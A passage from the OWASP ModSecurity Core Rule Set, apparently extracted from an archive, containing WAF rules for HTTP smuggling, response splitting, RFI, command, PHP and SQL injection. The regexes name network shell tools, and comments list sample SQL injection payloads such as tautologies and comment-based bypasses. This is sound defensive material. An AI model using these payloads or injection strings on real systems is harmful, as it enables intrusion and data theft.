"phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:htmlEntityDecode,t:lowercase,capture,ctl:auditLogParts=+E,block,msg:'Email Injection Attack',id:'950019',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/EMAIL_INJECTION-%{matched_var_name}=%{tx.0}" # # HTTP Request Smuggling # # -=[ Rule Logic ]=- # This rule looks for a comma character in either the Content-Length or Transfer-Encoding # request headers. This character would indicate that there were more than one request header # with this same name. In these instances, Apache treats the data in a similar manner as # multiple cookie values. # # -=[ References ]=- # http://projects.webappsec.org/HTTP-Request-Smuggling # http://article.gmane.org/gmane.comp.apache.mod-security.user/3299 # SecRule REQUEST_HEADERS:'/(Content-Length|Transfer-Encoding)/' "," "phase:1,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,block,msg:'HTTP Request Smuggling Attack.',id:'950012',tag:'OWASP_CRS/WEB_ATTACK/REQUEST_SMUGGLING',tag:'WASCTC/WASC-26',tag:'OWASP_TOP_10/A1',tag:'PCI/6.5.2',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/REQUEST_SMUGGLING-%{matched_var_name}=%{tx.0}" # # HTTP Response Splitting # # -=[ Rule Logic ]=- # These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters. # These characters may cause problems if the data is returned in a respones header and # may be interpreted by an intermediary proxy server and treated as two separate # responses. # # -=[ References ]=- # http://projects.webappsec.org/HTTP-Response-Splitting # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "[\n\r](?:content-(type|length)|set-cookie|location):" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:lowercase,capture,ctl:auditLogParts=+E,block,msg:'HTTP Response Splitting Attack',id:'950910',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RESPONSE_SPLITTING-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?:\bhttp\/(?:0\.9|1\.[01])|<(?:html|meta)\b)" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,block,msg:'HTTP Response Splitting Attack',id:'950911',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RESPONSE_SPLITTING-%{matched_var_name}=%{tx.0}" # # RFI Attack # # -=[ Rule Logic ]=- # These rules look for common types of Remote File Inclusion (RFI) attack methods. # - URL Contains an IP Address # - The PHP "include()" Function # - RFI Data Ends with Question Mark(s) (?) # - RFI Host Doesn't Match Local Host # # -=[ References ]=- # http://projects.webappsec.org/Remote-File-Inclusion # http://tacticalwebappsec.blogspot.com/2009/06/generic-remote-file-inclusion-attack.html # SecRule ARGS "^(?i)(?:ht|f)tps?:\/\/(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'Remote File Inclusion Attack',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'950117',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/RFI',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RFI-%{matched_var_name}=%{tx.0}" SecRule QUERY_STRING|REQUEST_BODY "(?i:(\binclude\s*\([^)]*|mosConfig_absolute_path|_CONF\[path\]|_SERVER\[DOCUMENT_ROOT\]|GALLERY_BASEDIR|path\[docroot\]|appserv_root|config\[root_dir\])=(ht|f)tps?:\/\/)" \ "phase:2,rev:'3',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:urlDecodeUni,capture,ctl:auditLogParts=+E,block,msg:'Remote File Inclusion Attack',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'950118',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/RFI',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RFI-%{matched_var_name}=%{tx.0}" SecRule ARGS "^(?i)(?:ft|htt)ps?(.*?)\?+$" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'Remote File Inclusion Attack',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'950119',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/RFI',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RFI-%{matched_var_name}=%{tx.0}" SecRule ARGS "^(?:ht|f)tps?://(.*)$" \ "chain,phase:2,rev:'3',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,capture,ctl:auditLogParts=+E,block,msg:'Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',id:'950120',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/RFI'" SecRule TX:1 "!@beginsWith %{request_headers.host}" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RFI-%{matched_var_name}=%{tx.1}" # # Prequalify Request Matches # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile modsecurity_40_generic_attacks.data" \ "phase:2,id:'981133',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,nolog,pass,setvar:tx.pm_score=+1" SecRule TX:PM_SCORE "@eq 0" "phase:2,id:'981134',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,pass,skipAfter:END_PM_CHECK,nolog" # # Begin RegEx Checks for target locations that matched the prequalifier checks # # # Session fixation # # -=[ References ]=- # http://projects.webappsec.org/Session-Fixation # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i)(?:\.cookie\b.*?;\W*?(?:expires|domain)\W*?=|\bhttp-equiv\W+set-cookie\b)" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:urlDecodeUni,capture,ctl:auditLogParts=+E,block,msg:'Session Fixation Attack',id:'950009',tag:'OWASP_CRS/WEB_ATTACK/SESSION_FIXATION',tag:'WASCTC/WASC-37',tag:'OWASP_TOP_10/A3',tag:'PCI/6.5.7',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SESSION_FIXATION-%{matched_var_name}=%{tx.0}" SecRule ARGS_NAMES "@pm jsessionid aspsessionid asp.net_sessionid phpsession phpsessid weblogicsession session_id session-id cfid cftoken cfsid jservsession jwsession" \ "chain,phase:2,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'1',accuracy:'7',t:none,t:lowercase,capture,ctl:auditLogParts=+E,block,msg:'Session Fixation',id:'950003',tag:'OWASP_CRS/WEB_ATTACK/SESSION_FIXATION',tag:'WASCTC/WASC-37',tag:'OWASP_TOP_10/A3',tag:'PCI/6.5.7',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2'" SecRule REQUEST_HEADERS:Referer "^(?:ht|f)tps?://(.*?)\/" "chain,capture" SecRule TX:1 "!@beginsWith %{request_headers.host}" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SESSION_FIXATION-%{matched_var_name}=%{tx.0}" SecRule ARGS_NAMES "@pm jsessionid aspsessionid asp.net_sessionid phpsession phpsessid weblogicsession session_id session-id cfid cftoken cfsid jservsession jwsession" \ "chain,phase:2,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'1',accuracy:'7',t:none,t:lowercase,capture,ctl:auditLogParts=+E,block,msg:'Session Fixation',id:'950000',tag:'OWASP_CRS/WEB_ATTACK/SESSION_FIXATION',tag:'WASCTC/WASC-37',tag:'OWASP_TOP_10/A3',tag:'PCI/6.5.7',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2'" SecRule &REQUEST_HEADERS:Referer "@eq 0" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SESSION_FIXATION-%{matched_var_name}=%{tx.0}" SecMarker END_SESSION_FIXATION # # File Injection # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?:\b(?:\.(?:ht(?:access|passwd|group)|www_?acl)|global\.asa|httpd\.conf|boot\.ini)\b|\/etc\/)" \ "phase:2,rev:'3',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,t:cmdLine,ctl:auditLogParts=+E,block,msg:'Remote File Access Attempt',id:'950005',tag:'OWASP_CRS/WEB_ATTACK/FILE_INJECTION',tag:'WASCTC/WASC-33',tag:'OWASP_TOP_10/A4',tag:'PCI/6.5.4',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/FILE_INJECTION-%{matched_var_name}=%{tx.0}" SecMarker END_FILE_INJECTION # # Command access # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\.exe\b|cmd(?:(?:32)?\.exe\b|\b\W*?\/c))" \ "phase:2,rev:'3',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,t:cmdLine,ctl:auditLogParts=+E,block,msg:'System Command Access',id:'950002',tag:'OWASP_CRS/WEB_ATTACK/FILE_INJECTION',tag:'WASCTC/WASC-31',tag:'OWASP_TOP_10/A1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/COMMAND_ACCESS-%{matched_var_name}=%{tx.0}" SecMarker END_COMMAND_ACCESS # # Command injection # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?:\b(?:(?:n(?:et(?:\b\W+?\blocalgroup|\.exe)|(?:map|c)\.exe)|t(?:racer(?:oute|t)|elnet\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\.exe|echo\b\W*?\by+)\b|c(?:md(?:(?:\.exe|32)\b|\b\W*?\/c)|d(?:\b\W*?[\\/]|\W*?\.\.)|hmod.{0,40}?\+.{0,3}x))|[\;\|\`]\W*?\b(?:(?:c(?:h(?:grp|mod|own|sh)|md|pp)|p(?:asswd|ython|erl|ing|s)|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)\b|g(?:\+\+|cc\b)))" \ "phase:2,rev:'3',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,t:cmdLine,ctl:auditLogParts=+E,block,msg:'System Command Injection',id:'950006',tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',tag:'WASCTC/WASC-31',tag:'OWASP_TOP_10/A1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION-%{matched_var_name}=%{tx.0}" SecMarker END_COMMAND_INJECTION # # PHP injection # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "<\?(?!xml)" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,ctl:auditLogParts=+E,block,msg:'PHP Injection Attack',id:'959151',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.2',tag:'WASCTC/WASC-25',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE4',tag:'PCI/6.5.2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/PHP_INJECTION-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i)(?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\$_(?:(?:pos|ge)t|session))\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,ctl:auditLogParts=+E,block,msg:'PHP Injection Attack',id:'958976',tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.2',tag:'WASCTC/WASC-25',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE4',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/PHP_INJECTION-%{matched_var_name}=%{tx.0}" SecRule QUERY_STRING "@pm allow_url_include= safe_mode= suhosin.simulation= disable_functions= open_basedir= auto_prepend_file= php://input" \ "phase:2,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'1',accuracy:'9',t:none,t:urlDecodeUni,t:lowercase,ctl:auditLogParts=+E,block,msg:'PHP Injection Attack',id:'958977',tag:'OWASP_CRS/WEB_ATTACK/PHP_INJECTION',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.2',tag:'WASCTC/WASC-25',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE4',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/PHP_INJECTION-%{matched_var_name}=%{tx.0}" SecMarker END_PM_CHECK �����������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_41_sql_injection_attacks.conf���0000664�0000000�0000000�00000125204�12164572564�0033700�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # References: # # SQL Injection Pocket Reference (via @LightOS) - # https://docs.google.com/Doc?docid=0AZNlBave77hiZGNjanptbV84Z25yaHJmMjk # # SQLi Filter Evasion Cheat Sheet - # http://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/ # # SQL Injection Cheat Sheet - # http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ # # SQLMap's Tamper Scripts (for evasions) # https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/ # # # -=[ Detect SQL Comment Sequences ]=- # # Example Payloads Detected: # ------------------------- # OR 1# # DROP sampletable;-- # admin'-- # DROP/*comment*/sampletable # DR/**/OP/*bypass blacklisting*/sampletable # SELECT/*avoid-spaces*/password/**/FROM/**/Members # SELECT /*!32302 1/0, */ 1 FROM tablename # ‘ or 1=1# # ‘ or 1=1-- - # ‘ or 1=1/* # ' or 1=1;\x00 # 1='1' or-- - # ' /*!50000or*/1='1 # ' /*!or*/1='1 # 0/**/union/*!50000select*/table_name`foo`/**/ # ------------------------- # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(/\*!?|\*/|[';]--|--[\s\r\n\v\f]|(?:--[^-]*?-)|([^\-&])#.*?[\s\r\n\v\f]|;?\\x00)" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',id:'981231',t:none,t:urlDecodeUni,block,msg:'SQL Comment Sequence Detected.',severity:'2',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.sql_injection_score=+1,setvar:'tx.msg=%{rule.msg}',setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" # # -=[ SQL Hex Evasion Methods ]=- # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:\A|[^\d])0x[a-f\d]{3,}[a-f\d]*)+" "phase:2,id:'981260',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:urlDecodeUni,block,msg:'SQL Hex Encoding Identified',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" # # -=[ String Termination/Statement Ending Injection Testing ]=- # # Identifies common initial SQLi probing requests where attackers insert/append # quote characters to the existing normal payload to see how the app/db responds. # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(^[\"'`´’‘;]+|[\"'`´’‘;]+$)" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,block,msg:'SQL Injection Attack: Common Injection Testing Detected',id:'981318',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" # # -=[ SQL Operators ]=- # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(\!\=|\&\&|\|\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\s+between\s+0\s+and)|(?:is\s+null)|(like\s+null)|(?:(?:^|\W)in[+\s]*\([\s\d\"]+[^()]*\))|(?:xor|<>|rlike(?:\s+binary)?)|(?:regexp\s+binary))" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,block,msg:'SQL Injection Attack: SQL Operator Detected',id:'981319',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.notice_anomaly_score},setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" # # -=[ SQL Tautologies ]=- # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:([\s'\"`´’‘\(\)]*?)\b([\d\w]++)([\s'\"`´’‘\(\)]*?)(?:(?:=|<=>|r?like|sounds\s+like|regexp)([\s'\"`´’‘\(\)]*?)\2\b|(?:!=|<=|>=|<>|<|>|\^|is\s+not|not\s+like|not\s+regexp)([\s'\"`´’‘\(\)]*?)(?!\2)([\d\w]+)\b))" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,multiMatch,t:none,t:urlDecodeUni,t:replaceComments,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack: SQL Tautology Detected.',id:'950901',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" # # -=[ Detect DB Names ]=- # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\.\.sysdatabases|ysql\.db)|s(?:ys(?:\.database_name|aux)|chema(?:\W*\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_nam)e\W*\(|information_schema|pg_(catalog|toast)|northwind|tempdb))" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack: Common DB Names Detected',id:'981320',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" # # SQL Keyword Anomaly Scoring # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm select show top distinct from dual where group by order having limit offset union rownum as (case" "phase:2,id:'981300',t:none,t:urlDecodeUni,t:lowercase,nolog,pass,nolog,setvar:'tx.sqli_select_statement=%{tx.sqli_select_statement} %{matched_var}'" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord select" "phase:2,id:'981301',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord show" "phase:2,id:'981302',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord top" "phase:2,id:'981303',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord distinct" "phase:2,id:'981304',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord from" "phase:2,id:'981305',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord dual" "phase:2,id:'981306',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord where" "phase:2,id:'981307',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@contains group by" "phase:2,id:'981308',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@contains order by" "phase:2,id:'981309',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord having" "phase:2,id:'981310',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord limit" "phase:2,id:'981311',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord offset" "phase:2,id:'981312',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@containsWord union" "phase:2,id:'981313',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@contains union all" "phase:2,id:'981314',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@contains rownum as" "phase:2,id:'981315',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT "@contains (case" "phase:2,id:'981316',t:none,pass,nolog,setvar:tx.sqli_select_statement_count=+1,setvar:tx.sql_injection_score=+1" SecRule TX:SQLI_SELECT_STATEMENT_COUNT "@ge 3" "phase:2,t:none,block,id:'981317',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',msg:'SQL SELECT Statement Anomaly Detection Alert',logdata:'Matched Data: 